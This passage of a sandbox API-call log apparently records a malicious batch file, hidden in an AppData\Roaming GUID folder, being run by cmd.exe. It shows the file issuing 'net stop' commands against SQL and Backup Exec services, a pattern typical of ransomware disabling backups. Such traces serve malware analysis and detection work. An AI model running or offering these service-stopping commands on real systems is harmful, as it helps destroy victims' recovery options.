_String2="SHIFT") returned -5 [0212.113] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0212.113] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0212.113] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0212.113] _wcsicmp (_String1="net", _String2="VER") returned -8 [0212.113] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0212.113] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0212.113] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0212.113] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0212.113] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0212.113] _wcsicmp (_String1="net", _String2="START") returned -5 [0212.113] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0212.113] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0212.113] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0212.113] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0212.113] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0212.113] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0212.113] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0212.113] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0212.113] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0212.113] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0212.114] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0212.114] SetErrorMode (uMode=0x0) returned 0x1 [0212.114] GetProcessHeap () returned 0x3e0000 [0212.114] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0212.114] GetProcessHeap () returned 0x3e0000 [0212.114] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0212.114] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0212.114] GetProcessHeap () returned 0x3e0000 [0212.114] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0212.114] GetProcessHeap () returned 0x3e0000 [0212.114] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0212.115] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0212.115] GetProcessHeap () returned 0x3e0000 [0212.115] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0212.115] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.115] GetProcessHeap () returned 0x3e0000 [0212.115] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0212.115] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0212.115] GetProcessHeap () returned 0x3e0000 [0212.115] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0212.116] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.116] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0212.116] GetLastError () returned 0x2 [0212.117] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0212.117] GetLastError () returned 0x2 [0212.117] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.118] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0212.118] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0212.118] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0212.118] GetLastError () returned 0x2 [0212.119] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0212.119] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0212.119] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.120] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0212.120] SetErrorMode (uMode=0x0) returned 0x1 [0212.120] GetProcessHeap () returned 0x3e0000 [0212.120] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0212.120] GetProcessHeap () returned 0x3e0000 [0212.120] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0212.120] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0212.120] GetProcessHeap () returned 0x3e0000 [0212.120] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0212.120] GetProcessHeap () returned 0x3e0000 [0212.120] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0212.121] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0212.121] GetProcessHeap () returned 0x3e0000 [0212.121] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0212.121] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.121] GetProcessHeap () returned 0x3e0000 [0212.121] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0212.121] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0212.121] GetProcessHeap () returned 0x3e0000 [0212.121] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0212.122] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.122] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0212.122] GetLastError () returned 0x2 [0212.123] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0212.123] GetLastError () returned 0x2 [0212.123] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.124] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0212.124] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0212.124] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0212.124] GetLastError () returned 0x2 [0212.125] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0212.125] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0212.125] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.125] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0212.125] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0212.125] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0212.126] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0212.126] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLSafeOLRService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLSafeOLRService /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLSafeOLRService /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x9f4, dwThreadId=0x95c)) returned 1 [0212.130] CloseHandle (hObject=0x74) returned 1 [0212.130] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0212.130] GetProcessHeap () returned 0x3e0000 [0212.130] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0212.130] GetEnvironmentStringsW () returned 0x3f8408* [0212.130] GetProcessHeap () returned 0x3e0000 [0212.130] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0212.130] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0212.130] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0212.262] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0212.263] CloseHandle (hObject=0x78) returned 1 [0212.263] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0212.263] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0212.263] GetProcessHeap () returned 0x3e0000 [0212.263] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0212.263] GetEnvironmentStringsW () returned 0x3f8408* [0212.263] GetProcessHeap () returned 0x3e0000 [0212.263] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0212.263] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0212.263] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0212.264] GetProcessHeap () returned 0x3e0000 [0212.264] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0212.264] GetEnvironmentStringsW () returned 0x3f8408* [0212.264] GetProcessHeap () returned 0x3e0000 [0212.264] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0212.264] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0212.264] GetProcessHeap () returned 0x3e0000 [0212.264] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0212.264] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0212.264] _get_osfhandle (_FileHandle=1) returned 0x264 [0212.264] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0212.264] _get_osfhandle (_FileHandle=1) returned 0x264 [0212.264] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0212.264] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0212.264] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0212.265] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0212.265] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0212.265] SetConsoleInputExeNameW () returned 0x1 [0212.265] GetConsoleOutputCP () returned 0x1b5 [0212.265] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0212.265] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.265] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0212.265] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0212.265] _get_osfhandle (_FileHandle=3) returned 0x78 [0212.265] SetFilePointer (in: hFile=0x78, lDistanceToMove=5119, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13ff [0212.266] GetProcessHeap () returned 0x3e0000 [0212.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0212.266] GetProcessHeap () returned 0x3e0000 [0212.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0212.266] GetProcessHeap () returned 0x3e0000 [0212.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0212.266] GetProcessHeap () returned 0x3e0000 [0212.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0212.266] GetProcessHeap () returned 0x3e0000 [0212.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0212.266] GetProcessHeap () returned 0x3e0000 [0212.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0212.266] GetProcessHeap () returned 0x3e0000 [0212.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0212.266] GetProcessHeap () returned 0x3e0000 [0212.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0212.266] GetProcessHeap () returned 0x3e0000 [0212.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0212.266] GetProcessHeap () returned 0x3e0000 [0212.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0212.266] GetProcessHeap () returned 0x3e0000 [0212.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0212.266] GetProcessHeap () returned 0x3e0000 [0212.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0212.266] GetProcessHeap () returned 0x3e0000 [0212.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0212.266] _get_osfhandle (_FileHandle=3) returned 0x78 [0212.266] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13ff [0212.266] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x4c2, lpOverlapped=0x0) returned 1 [0212.266] SetFilePointer (in: hFile=0x78, lDistanceToMove=5154, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1422 [0212.266] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=35, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop BackupExecVSSProvider /y\r\n\neΓÇ¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 35 [0212.267] _get_osfhandle (_FileHandle=3) returned 0x78 [0212.267] GetFileType (hFile=0x78) returned 0x1 [0212.267] _get_osfhandle (_FileHandle=3) returned 0x78 [0212.267] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1422 [0212.267] GetProcessHeap () returned 0x3e0000 [0212.267] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0212.267] GetProcessHeap () returned 0x3e0000 [0212.267] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0212.270] _tell (_FileHandle=3) returned 5154 [0212.271] _close (_FileHandle=3) returned 0 [0212.271] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0212.271] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0212.271] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0212.271] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0212.271] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0212.271] _wcsicmp (_String1="net", _String2="CD") returned 11 [0212.271] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0212.271] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0212.271] _wcsicmp (_String1="net", _String2="REN") returned -4 [0212.271] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0212.271] _wcsicmp (_String1="net", _String2="SET") returned -5 [0212.271] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0212.271] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0212.271] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0212.271] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0212.271] _wcsicmp (_String1="net", _String2="MD") returned 1 [0212.271] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0212.271] _wcsicmp (_String1="net", _String2="RD") returned -4 [0212.271] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0212.271] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0212.271] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0212.271] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0212.271] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0212.271] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0212.271] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0212.271] _wcsicmp (_String1="net", _String2="VER") returned -8 [0212.271] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0212.271] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0212.271] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0212.271] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0212.271] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0212.271] _wcsicmp (_String1="net", _String2="START") returned -5 [0212.271] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0212.271] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0212.272] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0212.272] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0212.272] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0212.272] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0212.272] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0212.272] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0212.272] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0212.272] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0212.273] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0212.273] SetErrorMode (uMode=0x0) returned 0x1 [0212.273] GetProcessHeap () returned 0x3e0000 [0212.273] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0212.273] GetProcessHeap () returned 0x3e0000 [0212.273] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0212.273] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0212.273] GetProcessHeap () returned 0x3e0000 [0212.273] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0212.273] GetProcessHeap () returned 0x3e0000 [0212.273] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0212.274] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0212.274] GetProcessHeap () returned 0x3e0000 [0212.274] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0212.274] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.274] GetProcessHeap () returned 0x3e0000 [0212.274] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0212.274] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0212.274] GetProcessHeap () returned 0x3e0000 [0212.274] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0212.274] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.275] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0212.275] GetLastError () returned 0x2 [0212.275] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0212.276] GetLastError () returned 0x2 [0212.276] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.276] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0212.276] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0212.277] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0212.277] GetLastError () returned 0x2 [0212.277] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0212.277] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0212.278] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.278] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0212.278] SetErrorMode (uMode=0x0) returned 0x1 [0212.278] GetProcessHeap () returned 0x3e0000 [0212.278] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0212.278] GetProcessHeap () returned 0x3e0000 [0212.279] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0212.279] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0212.279] GetProcessHeap () returned 0x3e0000 [0212.279] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0212.279] GetProcessHeap () returned 0x3e0000 [0212.279] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0212.279] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0212.279] GetProcessHeap () returned 0x3e0000 [0212.279] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0212.279] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.279] GetProcessHeap () returned 0x3e0000 [0212.279] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0212.280] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0212.280] GetProcessHeap () returned 0x3e0000 [0212.280] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0212.280] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.281] FindFirstFileExW (in: 